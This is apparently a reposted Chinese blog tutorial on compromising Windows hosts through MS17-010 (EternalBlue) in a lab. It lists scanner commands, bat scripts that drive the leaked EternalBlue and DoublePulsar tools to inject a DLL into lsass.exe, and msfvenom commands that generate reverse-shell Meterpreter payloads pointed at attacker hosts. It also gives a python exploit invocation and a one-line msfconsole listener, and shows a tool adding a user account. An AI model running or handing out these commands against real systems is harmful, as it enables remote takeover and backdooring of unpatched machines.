域渗透之MS07010的多种打法

  • 本文主要介绍NSA原版MS17-010利用
  • metasploit 利用网上太多了,这里就不介绍了

漏洞介绍

漏洞名称:永恒之蓝

漏洞编号:MS17-010,CVE-2017-0143/0144/0145/0146/0147/0148

漏洞类型:缓冲区溢出漏洞

漏洞影响:Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; Windows Server 2016

实验环境

kali

  • ip:192.168.0.18

win7

  • ip:192.168.0.28

wKg0C2OOtCWAA7WwAADZXsawMoo550.png

wKg0C2OOtDGARX3uAAA2wnNzCu4477.png

wKg0C2OOtDyAV2hbAABuZp4cbhY896.png

wKg0C2OOtEaADdudAAEkzP9kvJA167.png

MS17010检查

checker.py

GitHub:https://github.com/worawit/MS17-010

\<span class="ne-text">python2 checker.py 192.168.0.28\</span>

wKg0C2OOtFCANP8AAByCgpP5cc542.png

check.bat

GitHub:https://github.com/3gstudent/Smbtouch-Scanner

新建\<span class="ne-text">check.bat\</span>

@Smbtouch-1.1.1.exe --TargetIp %1 --OutConfig 1.txt

\<span class="ne-text">check.bat 192.168.0.28\</span>

wKg0C2OOtGWAD0SAADSWDxqE166.png

Ladon

\<span class="ne-text">Ladon.exe 192.168.0.28 MS17010\</span>

wKg0C2OOtGAKPJAABLiyYT6V0021.png

fscan

\<span class="ne-text">fscan -h 192.168.0.28\</span>

wKg0C2OOtHuADZo3AABsmXUIoE178.png

总之方法有很多,选择自己喜欢的

MS17010利用

有防火墙

参考:

本人没成功,终究还是太菜了

【MS17010打法】 https://www.bilibili.com/video/BV1Ye4y1k7X9/?share_source=copy_web&vd_source=2eb72ea5238fe3398c820713b04697ff

无防火墙

环境和上面不一样,但是不影响

Github:

  1. https://github.com/x0rz/EQGRP_Lost_in_Translation

将工具包中以下三个目录中的文件拷贝到同一个目录中(因为64位系统是支持32位的,所以直接复制32位的就好):

windows\lib\x86-Windows\

windows\specials\

windows\payloads\

然后在目录中,把Eternalblue-2.2.0.0.xml文件重命名成Eternalblue-2.2.0.xml,Doublepulsar-1.3.1.0.xml改为Doublepulsar-1.3.1.xml

为了方便使用,编写bat脚本

\<span class="ne-text">attack.bat 192.168.0.28\</span>

@echo off
echo =============== [ TargetIp: %1 ] ===============
Eternalblue-2.2.0.exe --InConfig Eternalblue-2.2.0.xml --TargetIp %1 --TargetPort 445 --Target WIN72K8R2

\<span class="ne-text">backdoor.bat 192.168.0.28 exp.dll\</span>

@echo off
echo ================================================
echo [info] TargetIp: %1
echo [info] Architecture: %2
echo [info] DllPayload: %3
echo ================================================
Doublepulsar-1.3.1.exe --InConfig Doublepulsar-1.3.1.xml --TargetIp %1 --TargetPort 445 --Protocol SMB --Architecture %2 --Function RunDLL --DllPayload %3 --payloadDllOrdinal 1 --ProcessName lsass.exe --ProcessCommandLine "" --NetworkTimeout 60
  1. https://github.com/Telefonica/Eternalblue-Doublepulsar-Metasploit

\<span class="ne-text">deps\</span>文件夹,在目录中,把Eternalblue-2.2.0.0.xml文件重命名成Eternalblue-2.2.0.xml,Doublepulsar-1.3.1.0.xml改为Doublepulsar-1.3.1.xml

wKg0C2OOtI6ATiQgAAAyZqLvPI045.png

编写bat脚本,使用方法和上面一样

@echo off
echo =============== [ TargetIp: %1 ] ===============
Eternalblue-2.2.0.exe --TargetIp %1 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig outlog.txt
@echo off
echo ================================================
echo [info] TargetIp: %1
echo [info] Architecture: %2
echo [info] DllPayload: %3
echo ================================================
Doublepulsar-1.3.1.exe --InConfig Doublepulsar-1.3.1.xml --TargetIp %1 --TargetPort 445 --Protocol SMB --Architecture %2 --Function RunDLL --DllPayload %3 --payloadDllOrdinal 1 --ProcessName lsass.exe --ProcessCommandLine "" --NetworkTimeout 60

利用一

NSA原版MS17-010

记得metasploit开启监听

#metasploit生成dll文件
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=9999 -f dll > winx64.dll  
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=9999 -f dll > winx86.dll  

1.检查MS17010

wKg0C2OOtJmAQIoAADFfJ2VJmE842.png

2.攻击

wKg0C2OOtKWAGmRXAAEYqdzK9dU139.png

wKg0C2OOtLCARz9TAAE2V4yt8u4361.png

3.漏洞利用

wKg0C2OOtLmAEx9kAAEsFQFzPic467.png

wKg0C2OOtMSAKm8AAFke7wYw6k245.png

metasploit上线

wKg0C2OOtMuAROq5AADedaYJEns699.png

利用二

K8哥哥的\<span class="ne-text">ksmb.exe\</span>

wKg0C2OOtNOAYoGyAADEWTcaCY8216.png

成功添加用户

wKg0C2OOtNyAJpNuAAA5NyMZ9KA039.png

利用三

https://blackwolfsec.cc/2017/05/12/Eternalblue_ms17-010/

需要多次利用才能成功

#生成shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.18 LPORT=1111 -f raw > shellcode

#利用
python3 ms17-010.py --host 192.168.0.28 --file shellcode

加上\<span class="ne-text">--port 445\</span>会报错

1.攻击

wKg0C2OOtOOAMNNfAAD8WrYCu1A120.png

2.监听后成功上线

#一键启动监听
msfconsole -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 192.168.0.18; set lport 1111; exploit - j; "

wKg0C2OOtPCAIWMKAAAxd9imJA0088.png

免责声明:文章内容不代表本站立场,本站不对其内容的真实性、完整性、准确性给予任何担保、暗示和承诺,仅供读者参考,文章版权归原作者所有。如本文内容影响到您的合法权益(内容、图片等),请及时联系本站,我们会及时删除处理。查看原文

为您推荐